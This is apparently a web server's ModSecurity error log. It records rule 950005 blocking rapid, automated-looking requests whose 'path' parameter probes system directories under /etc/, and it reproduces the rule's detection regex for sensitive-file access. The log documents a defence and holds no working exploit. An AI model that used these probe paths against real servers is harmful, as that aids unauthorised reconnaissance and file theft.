[unique_id "ab1acPXLqtnMIWvjpaLI5AAAAog"]
[Fri Mar 20 11:32:16.891696 2026] [:error] [pid 7893:tid 140411691570944] [client 216.73.216.191:43570] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acBCii7xarUs8iHaYRgAAAgY"]
[Fri Mar 20 11:32:16.944630 2026] [:error] [pid 15826:tid 140411649607424] [client 216.73.216.191:43572] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acOoXxyEfFpUF8f-twAAAAUs"]
[Fri Mar 20 11:32:17.003102 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.37:43574] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1acRCii7xarUs8iHaYRwAAAgA"]
[Fri Mar 20 11:32:17.171097 2026] [:error] [pid 7235:tid 140411565680384] [client 216.73.216.191:43536] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acfqxLDW4GITHUkQYFAAAARU"]
[Fri Mar 20 11:32:17.353466 2026] [:error] [pid 7893:tid 140411674785536] [client 216.73.216.191:43588] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acRCii7xarUs8iHaYSAAAAgg"]
[Fri Mar 20 11:32:17.450334 2026] [:error] [pid 7893:tid 140411548894976] [client 216.73.216.191:43594] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acRCii7xarUs8iHaYSQAAAhc"]
[Fri Mar 20 11:32:17.545493 2026] [:error] [pid 21219:tid 140411557287680] [client 216.73.216.191:43598] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acfXLqtnMIWvjpaLI5wAAApY"]
[Fri Mar 20 11:32:17.848114 2026] [:error] [pid 15826:tid 140411616036608] [client 216.73.216.191:43616] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aceoXxyEfFpUF8f-twQAAAU8"]
[Fri Mar 20 11:32:18.059777 2026] [:error] [pid 26799:tid 140411733534464] [client 216.73.216.191:43636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acta6ubjKNq_cu4YJbgAAA0E"]
[Fri Mar 20 11:32:18.160036 2026] [:error] [pid 7235:tid 140411582465792] [client 216.73.216.191:43644] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acvqxLDW4GITHUkQYFwAAARM"]
[Fri Mar 20 11:32:19.929647 2026] [:error] [pid 7235:tid 140411624429312] [client 216.73.216.191:43668] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acvqxLDW4GITHUkQYGgAAAQ4"]
[Fri Mar 20 11:32:19.940216 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:43678] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1acl1pVZ5mVmJwsFNckwAAAEs"]
[Fri Mar 20 11:32:20.287658 2026] [:error] [pid 15826:tid 140411557287680] [client 216.73.216.191:43738] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adOoXxyEfFpUF8f-txAAAAVY"]
[Fri Mar 20 11:32:20.403301 2026] [:error] [pid 9818:tid 140411590858496] [client 216.73.216.191:43746] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adF1pVZ5mVmJwsFNclgAAAFI"]
[Fri Mar 20 11:32:20.756810 2026] [:error] [pid 26799:tid 140411557287680] [client 216.73.216.191:43780] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adNa6ubjKNq_cu4YJbwAAA1Y"]
[Fri Mar 20 11:32:21.396289 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:43754] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adV1pVZ5mVmJwsFNcmAAAAEE"]
[Fri Mar 20 11:32:21.519673 2026] [:error] [pid 21219:tid 140411574073088] [client 216.73.216.191:43810] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adfXLqtnMIWvjpaLI6gAAApQ"]
[Fri Mar 20 11:32:22.005952 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:43848] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adgF0L0L-SsrnPo6XOgAAAs0"]
[Fri Mar 20 11:32:22.115002 2026] [:error] [pid 31215:tid 140411624429312] [client 216.73.216.191:43862] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adgF0L0L-SsrnPo6XOwAAAs4"]
[Fri Mar 20 11:32:22.915103 2026] [:error] [pid 9818:tid 140411708356352] [client 216.73.216.191:43904] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adl1pVZ5mVmJwsFNcmQAAAEQ"]
[Fri Mar 20 11:32:23.035799 2026] [:error] [pid 26799:tid 140411658000128] [client 216.73.216.191:43914] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ad9a6ubjKNq_cu4YJcwAAA0o"]
[Fri Mar 20 11:32:23.111093 2026] [:error] [pid 10189:tid 140411674785536] [client 216.73.216.191:43918] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adzJ3M9BSuKP7CAZVQgAAAIg"]
[Fri Mar 20 11:32:23.236156 2026] [:error] [pid 31215:tid 140411683178240] [client 216.73.216.191:43930] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adwF0L0L-SsrnPo6XPgAAAsc"]
[Fri Mar 20 11:32:23.315341 2026] [:error] [pid 15826:tid 140411658000128] [client 216.73.216.191:43934] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ad-oXxyEfFpUF8f-tyQAAAUo"]
[Fri Mar 20 11:32:23.427473 2026] [:error] [pid 26799:tid 140411725141760] [client 216.73.216.191:43940] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ad9a6ubjKNq_cu4YJdAAAA0I"]
[Fri Mar 20 11:32:23.602368 2026] [:error] [pid 9818:tid 140411691570944] [client 216.73.216.191:43954] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ad11pVZ5mVmJwsFNcmgAAAEY"]
[Fri Mar 20 11:32:23.721087 2026] [:error] [pid 7893:tid 140411649607424] [client 216.73.216.191:43956] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1adxCii7xarUs8iHaYTwAAAgs"]
[Fri Mar 20 11:32:24.383043 2026] [:error] [pid 21219:tid 140411624429312] [client 216.73.216.191:44016] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aePXLqtnMIWvjpaLI8QAAAo4"]
[Fri Mar 20 11:32:24.731129 2026] [:error] [pid 31215:tid 140411607643904] [client 216.73.216.191:44034] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aeAF0L0L-SsrnPo6XQwAAAtA"]
[Fri Mar 20 11:32:24.864943 2026] [:error] [pid 9818:tid 140411557287680] [client 216.73.216.191:44044] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aeF1pVZ5mVmJwsFNcmwAAAFY"]
